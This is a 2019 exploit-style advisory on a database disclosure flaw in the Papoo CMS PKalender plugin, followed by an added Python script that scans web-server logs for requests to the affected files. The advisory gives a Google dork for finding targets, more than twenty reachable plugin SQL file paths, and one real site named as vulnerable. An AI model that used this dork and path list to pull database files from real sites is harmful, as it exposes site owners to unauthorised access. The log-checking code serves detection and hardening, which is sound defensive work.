- ####################################################################
- # Exploit Title : Papoo CMS PKalender Plugins 3.5 Database Disclosure
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 28/01/2019
- # Vendor Homepage : papoo.de
- # Software Download Links :
- + papoo.de/index.php?menuid=169&downloadid=352&reporeid=349
- + papoo.de/free-cms-kostenloser-download.html
- + papoo.de/6-papoo-pro-downloadversion.html
- + papoo.de/18-papoo-business-version-downloadversion.html
- + papoo.de/147-papoo-enterprise-cms.html
- # Software Information Link : papoo.de/f-2-12-153-kalender-plugin.html
- # Software Version : 3.5 and 4
- # Software Price : Free and Paid [ 99 Euro - 379 Euro - 699 Euro ]
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : inurl:/plugins/pkalender/sql/
- # Vulnerability Type : CWE-200 [ Information Exposure ]
- ####################################################################
- # Impact :
- **********
- Papoo CMS PKalender Plugins 3.5 has a database disclosure vulnerability.
- Information exposure is the intentional or unintentional disclosure of
- information to an actor that is not explicitly authorized to have access to that information.
- ####################################################################
- # Database Disclosure Exploit :
- ***************************
- /plugins/pkalender/sql/pkalender_deinstall.sql
- /plugins/pkalender/sql/pkalender_install.sql
- /plugins/pkalender/sql/update.sql
- # Other Plugins Database Disclosure Exploit =>
- *****************************************
- /plugins/fb_plugin/sql/fb_plugin_deinstall.sql
- /plugins/fb_plugin/sql/fb_plugin_install.sql
- /plugins/fb_plugin/sql/update.sql
- /plugins/freiemodule/sql/freiemoduleplugin_install.sql
- /plugins/galerie/sql/galerie_deinstall.sql
- /plugins/galerie/sql/galerie_install.sql
- /plugins/lagsh/sql/lagsh_deinstall.sql
- /plugins/lagsh/sql/lagsh_install.sql
- /plugins/lagsh_termine/sql/lagsh_termine_deinstall.sql
- /plugins/lagsh_termine/sql/lagsh_termine_install.sql
- /plugins/newsletter_lagsh/sql/newsletter_lagsh_deinstall.sql
- /plugins/newsletter_lagsh/sql/newsletter_lagsh_install.sql
- /plugins/projekte/sql/projekt_deinstall.sql
- /plugins/projekte/sql/projekt_install.sql
- /plugins/rssfeed/sql/test_deinstall.sql
- /plugins/rssfeed/sql/test_install.sql
- /plugins/selbsthilfe/sql/selbsthilfe_deinstall.sql
- /plugins/selbsthilfe/sql/selbsthilfe_install.sql
- /plugins/social_media_buttons/sql/social_media_buttons_deinstall.sql
- /plugins/social_media_buttons/sql/social_media_buttons_install.sql
- /plugins/sprechomat/sql/sprechomat_deinstall.sql
- /plugins/sprechomat/sql/sprechomat_install.sql
- /plugins/umfrage/sql/umfrage_delete.sql
- /plugins/umfrage/sql/umfrage_install.sql
- ###################################################################
- # Example Vulnerable Site :
- *************************
- [+] selbsthilfenetzwerk-sachsen.de/plugins/pkalender/sql/pkalender_install.sql
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
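Added example, not part of the original paste: a log check for site operators that reports which plugin SQL files of the form /plugins/<plugin>/sql/<file>.sql were requested and whether the server actually served them. It assumes Apache/nginx combined log format; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Combined log format: ip ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})\b'
)
# Path shape listed in the advisory: /plugins/<plugin>/sql/<file>.sql
SQL_RE = re.compile(r'^/plugins/(?P<plugin>[^/]+)/sql/[^/]+\.sql$', re.IGNORECASE)
SERVED = {200, 206, 304}  # statuses meaning the file exists and is reachable

def normalise(target):
    """Drop the query string, percent-decode, and collapse repeated slashes."""
    path = unquote(target.split("?", 1)[0])
    return re.sub(r"/{2,}", "/", path)

def find_sql_requests(lines):
    """Return one record per request that targets a plugin SQL file."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line
        path = normalise(m["target"])
        s = SQL_RE.match(path)
        if s:
            status = int(m["status"])
            hits.append({"ip": m["ip"], "plugin": s["plugin"].lower(),
                         "path": path, "status": status,
                         "served": status in SERVED})
    return hits

def exposed_plugins(hits):
    """Plugins whose SQL files were served, i.e. still need a deny rule."""
    return sorted({h["plugin"] for h in hits if h["served"]})

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [28/Jan/2019:10:00:01 +0000] "GET /plugins/pkalender/sql/pkalender_install.sql HTTP/1.1" 200 4312',
    '192.0.2.10 - - [28/Jan/2019:10:00:02 +0000] "GET /plugins/galerie/sql/galerie_install.sql HTTP/1.1" 403 199',
    '198.51.100.7 - - [28/Jan/2019:10:05:00 +0000] "GET /plugins//umfrage/sql/umfrage%5Finstall.SQL?x=1 HTTP/1.1" 200 2100',
    '198.51.100.7 - - [28/Jan/2019:10:06:00 +0000] "GET /plugins/pkalender/css/style.css HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for h in find_sql_requests(SAMPLE_LOG):
        print(h["ip"], h["status"], "SERVED" if h["served"] else "blocked", h["path"])
```

A plugin reported by exposed_plugins() is one where the web server still hands out files from its sql/ directory; a 403 or 404 on the same path shows the deny rule is in place.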